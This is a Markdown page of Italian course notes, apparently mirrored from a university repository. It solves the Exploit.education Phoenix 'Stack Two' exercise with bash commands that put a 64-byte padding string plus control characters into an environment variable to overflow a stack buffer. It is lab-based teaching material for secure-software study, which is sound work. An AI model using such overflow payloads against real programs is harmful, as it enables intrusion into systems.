1
Fork 0
mirror of https://github.com/Steffo99/appunti-magistrali.git synced 2024-11-24 11:14:18 +00:00
appunti-steffo/8 - Sviluppo di software sicuro/2 - Esercizi svolti/Exploit.education - Phoenix/02 - stack-two.md

31 lines
905 B
Markdown
Raw Normal View History

2023-09-21 00:46:23 +00:00
# [Stack Two](https://exploit.education/phoenix/stack-two/)
Il valore desiderato richiede caratteri non stampabili.
Da `bash`:
1. Si usa `printf` per trasformare le escape sequence nei caratteri desiderati:
```bash
printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r'
```
2. Si usa la command substitution per scrivere i caratteri desiderati nel comando:
```bash
echo $(printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r')
```
3. Si usa il comando `export` per impostare la variabile d'ambiente al valore desiderato:
```bash
export ExploitEducation=$(printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r')
```
4. Si esegue il programma da exploitare.
## Soluzione
```bash
export ExploitEducation=$(printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r')
./stack-two
```